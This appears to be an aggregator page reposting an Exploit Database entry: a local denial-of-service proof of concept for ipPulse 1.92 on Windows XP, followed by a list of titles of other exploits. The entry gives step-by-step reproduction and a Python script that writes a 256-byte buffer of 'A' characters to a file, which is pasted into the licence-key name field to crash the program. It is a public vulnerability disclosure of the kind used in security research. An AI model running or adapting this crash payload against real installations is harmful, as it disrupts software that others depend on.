ipPulse 1.92 – ‘Licence Key’ Denial of Service (PoC)

Exploit Database
18 阅读

作者： Shubham Singh

日期： 2018-07-31
类别：
- dos
平台：
- windows
来源：https://www.exploit-db.com/exploits/45110/

# Exploit Title: ipPulse 1.92 - 'License Key' Denial of Service (PoC)
# Discovery by: Shubham Singh
# Known As: Spirited Wolf Twitter: @Pwsecspirit
# Discovery Date: 2018-07-30
# Vendor Homepage: https://www.netscantools.com/ippulseinfo.html
# Software Link: http://download.netscantools.com/ipls192.zip
# Tested Version: 1.92
# Vulnerability Type: Denial of Service (DoS) Local
# Tested on OS: Windows xp Service pack3 x86 

# Steps to Reproduce: 
# Run the python exploit.py , Open exploit.txt and copy content.
# Open ippulse.exe , Click On "Enter Key".
# In the name field paste the content of "exploit.txt" and in Key type anything.
# Press "OK" and B00m Crashed.

#!/usr/bin/env python
 
buffer = "\x41" * 256
f = open ("exploit.txt", "w")
f.write(buffer)
f.close()

last Exploits
ipPulse 1.92 – ‘Licence Key’ Denial of Service (PoC)的更多信息

LeadTools 11.5.0.9 – ‘ltisi11n.ocx’ DriverName() Access Violation Denial of Service：
APNGDis 2.8 – ‘image width / height chunk’ Heap Buffer Overflow：
Microsoft Edge Chakra – ‘JavascriptFunction::ReparseAsmJsModule’ Incorrectly Re-parses：
Microsoft Windows Kernel – ‘nt!KiDispatchException’ 64-bit Stack Memory Disclosure：
lighttpd 1.4/1.5 – Slow Request Handling Remote Denial of Service：
Android – ‘getpidcon’ Permission Bypass in KeyStore Service：
VideoLAN VLC Media Player 2.0.3 – ‘.png’ ReadAV Crash (PoC)：
Microsoft Windows Kernel – Pool Buffer Overflow Drawing Caption Bar (MS15-061)：